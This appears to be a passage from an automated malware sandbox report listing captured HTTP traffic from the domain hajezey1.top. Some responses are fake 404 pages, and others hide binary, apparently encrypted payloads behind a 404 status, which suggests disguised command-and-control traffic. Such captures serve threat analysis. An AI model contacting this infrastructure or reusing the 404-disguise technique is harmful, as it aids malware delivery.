b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 4f 5a 96 da 19 d1 3a 2d ca 41 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 8d 7d 14 2c d0 e8 b1 14 1d 73 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 02 43 64 cd 25 5c 8d b7 d7 21 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 6a b7 be 34 56 9b 46 76 99 86 11 00 83 32 42 ea 6f cf ae 04 5d 94 36 e1 48 50 67 35 50 b8 81 be f0 80 de 5b 46 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 85 62 4a 52 7d 54 7a 08 6c 39 c0 5e f3 5c 19 6d 63 95 be 07 3d da 9a 3e 05 22 7d e6 b2 68 60 bd 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 47 4e a1 21 84 88 4b 2e 69 81 77 af dd c6 83 41 df 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 4e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 3d 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 9b 09 09 a8 00 13 30 7b 88 cc c9 e1 a3 c3 e5 0f 25 93 23 c4 a9 d7 cf 8e 3d 39 dc 46 ba 58 dc be b0 98 3f d8 94 eb 53 43 a1 0c 97 e4 6e 76 f9 14 34 0b 64 82 b2 64 4f 55 e0 ca 5e c3 bd c0 88 0b 54 d9 1d 69 7a de ff 3d e1 03 70 2e 1f f4 d4 6a a9 a9 16 da
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 42 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 76 92 71 06 45 a6 3e 11 dc a4 a3 a6 7e d8 6c a2 05 09 17 f6 cb ee 72 76 25 3f 50 19 01 bf 01 ea 53 01 b3 15 20 f5 3b e2 2a c2 d5 71 18 46 9b 3d f9 5c 40 8f ba f1 80 fe 05 b5 79 9e 10 b0 fb 14 9e 76 e9 bb 27 58 a4 0c 87 05 f0 bf 5f 60 08 d9 eb a8 e1 48 a8 03 88 31 7c 3b 66 ab 4b 11 c0 4d 08 0e 77 13 9e 09 5f 47 0b 5d 16 75 32 39 c5 f7 15 67 aa cf d0 c0 78 9e 0d a3 75 c1 96 52 88 36 19 ff bd 88 13 d8 06 0e 25 4f 12 7d 6f ed e0 04 89 19 d7 57 80 90 30 89 ec f4 4a 6b b6 f0 a2 22 4d 32 d3 49 ad ff bc ff 1a fd f4 3f f4 6f d3 7c cb c6 a8 cc 4e 4d b3 0b 97 2a 60 55 59 ad 30 fb 83 3b 3b ca c3 f3 b2 ec 92 90 1f 1c 57 fe 87 7e 0c 35 8a 3d 40 7f d0 56 81 96 9b 97 9e 70 9f 8a a2 25 44 5a c9 b2 cb 99 64 21 68 85 d2 f8 b8 56 b0 40 f6 0a bf 8b 71 91 e0 55 d0 66 21 df 76 79 27 e4 21 94 42 22 d1 3a 0d b4 43 06 1e 27 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 f0 d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 91 3d 4b 04 78 2d 7f 14 2c d6 e8 b1 14 73 71 10 22 07 4a 86 97 31 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 70 9c 82 97 d1 d6 4a 13 a7 e9 4d 51 c2 41 64 e3 53 39 f5 c3 a3 23 0c 28 df 52 d2 eb f9 23 19 9d 8c 3f 70 36 45 ae e4 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 f8 62 47 22 0b 85 d4 ca 55 56 9b 46 76 1d f3 13 02 63 34 42 c2 0c ce ae 70 85 96 36 e2 48 50 67 74 50 b8 87 f6 bc 81 de fb 6e 6a f6 e1 7b 54 3c 81 d2 be 95 df e2 63 10 ec 88 c0 5d 14 66 f2 e6 2f 59 47 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 65 f5 b8 90 c4 f7 07 26 67 1e 54 7a 54 4f 38 c0 5e 33 25 1b 6e 47 94 be 07 13 de 9a 3e 05 22 7d e6 b2 68 60 b9 10 31 eb 8d fc 25 57 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af dd c6 83 41 67 30 ae b8 e8 21 10 a0 57 6e 61 87 bd 77 6a 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 52 d3 e4 9e 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 9e 55 06 63 17 e5 ff dc fc be 1e b4 53 d9 63 ba 53 11 91 1d f4 0d 0a 30 0d 0a 0d 0a Data Ascii: 29I:82OUcScS0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5d Data Ascii: =]
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:57 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 12:11:02 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 37 33 33 0d 0a b8 00 00 00 c7 1a b3 fa 05 54 a4 5f 28 1e c5 73 c8 bb 6f 2d ae 22 c0 a9 8f 89 bd 2a 1c 21 f8 64 eb 16 a1 85 cc be 11 ce 58 26 9a 05 1e 5c c6 c1 69 3a 30 5b 9b c4 28 c2 ef 63 ab b5 4a e8 89 6e 9c 3d f7 c6 fe 06 43 1d 42 b0 fa b9 17 9d bc 30 e1 7d b4 71 0c f3 55 ca a6 9d 45 22 ea 9d de 0a 6c 39 20 12 7c 4b 07 4c f2 97 87 24 3a c2 ff e2 61 c9 ff 82 3e 8d 64 f6 2c 24 84 19 bd fa 7b 18 4f ce fd ab 1c f3 bb 9d 70 2b 2b eb ec 0b b0 37 d1 d7 3d 24 bb 29 51 24 7c 4e e0 35 9d 11 e0 42 10 5e 4d 2f 68 41 22 93 01 8f 26 1e 4b e8 70 6a ed 03 43 fd b3 0a b8 09 cd 31 c3 31 00 76 26 05 00 99 e1 70 64 01 08 02 00 05 00 9c 03 00 00 8f 53 a0 cd 6b ff f3 42 ef be 5f a6 0b 12 1e 00 fa 2d 5f bc 60 48 43 c4 3f a0 d1 42 cb fe 22 d0 1e 94 d6 c5 1a 29 6e 08 cd c8 2d c7 4d 7e 61 df 49 1a 97 84 14 51 2c 4c e4 c5 d6 02 94 b8 c5 49 53 0d 5e 82 e6 83 ab 8e 62 c5 9d 46 0b a0 aa 3e c7 fd d6 bc a4 ad e8 3c 50 ba e0 3c fe e9 66 4d 4e a6 6b ea 3a 3d ce 29 2a 37 e9 6c 89 d6 f5 15 31 cc 37 72 61 7e 22 b0 24 77 36 7c 4e 6b 9a aa 32 ae ff ad 7d d1 69 71 5e 52 c5 cc 89 d6 bb fa 1e 30 d1 95 9d 4c 69 ee fe ef 04 01 d8 3e 1b 87 e4 46 c1 6e fb 21 19 c0 a0 dd 94 37 60 40 b8 71 82 cf 26 ba ba 93 8d d0 d2 c2 59 ae 5a 2b f1 dd f6 78 90 66 b1 4e ca f3 88 94 76 73 aa 67 95 39 13 f9 1a 7e db 59 b0 5a be ea a7 57 2c da 41 2f 3b 44 99 a6 d1 e3 ae 5d 44 1c 04 12 87 6b 36 97 f0 39 ba 17 30 82 22 5d 97 9c 25 f8 0f 01 a5 f3 47 51 4b c6 6c ab e9 ee 5b 16 36 f0 62 25 02 ed 05 a6 10 4e c2 e6 19 fe 62 4e c5 5b d6 25 26 c8 0b 8d ec 99 23 41 05 8c 38 bb 0c c3 e8 42 32 14 41 b7 83 9c af 9a 27 3e 5a 59 7c a3 5e ee 1c 9c 12 fc 53 8b e3 c9 3c 9d f9 b6 c4 e6 9f 86 54 45 f9 ea dc e7 d2 62 dd f4 b6 fc 61 49 d6 3d 2d fb 53 9e df 18 af 5e 30 3d 56 2a 0f 38 20 a4 0d c3 98 c2 87 1d fd 7b 76 27 90 ad 0d f8 1c 82 12 74 be 06 e5 be c0 91 3d 8d d9 76 35 3a 86 ce 8b 57 89 6b 9e 6b 94 4b fe 6e 7b 84 16 f5 b4 5c b4 8f df 2a 68 2b 33 43 0b 6e 60 35 e6 3b 93 c5 fd e6 62 80 69 e2 92 79 02 9e 47 77 90 92 90 52 4f cf 29 e7 8b 19 b7 16 d5 1a 92 65 37 c9 26 3c 17 27 bd 55 08 ce c3 07 7a 53 f1 6f 43 0a 86 a0 32 60 f8 0d f1 24 e9 e4 c0 fb cd ae cb cb 6c 00 9c ef 2f 87 07 95 d6 a2 32 a9 f4 6b d7 2c e8 2c 27 c2 b7 00 ef 75 ec d5 58 86 2a ad a4 97 43 9a 52 8f 28 e9 1b ce e1 d3 d0 78 92 a0 ab 1e e0 dd 3d cc e0 5a 14 90 1d 7d 10 44 b2 b1 04 a8 db 37 c3 a1 bb 3b 1c f8 3e 56 ed 73 dd 7d b0 6b 95 36 fd 00 c5 00 b0 6f 9b 2b 71 fb 79 82 a6 e1 23 c2 b9 8a a8 89 62 ba 2d 12 c6 52 d3 b1 97 b5 64 20 e9 05 e7 b4 dd e7 89 3a 3b a5 25 ec 86 96 39 8e 21 04 ab 93 4a ec 81 e7 55 81 50 94 e0 5b 5b 40 17 8f ac 1e 17 68 a5 e6 f4 09 11 8f 34 77 8f dc 57 87 c9 7d d9 e7 6b 23 6c 4e d0 db 94 61 ae f2 5c 36 c5 15 c9 a7 a3 39 4b 2b 05 81 e2 8b cf fa 08 90 e8 55 0c 8b 78 14 91 04 c2 44 ed b6 c6 17 7c 82 6c 40 c6 ec b6 91 3
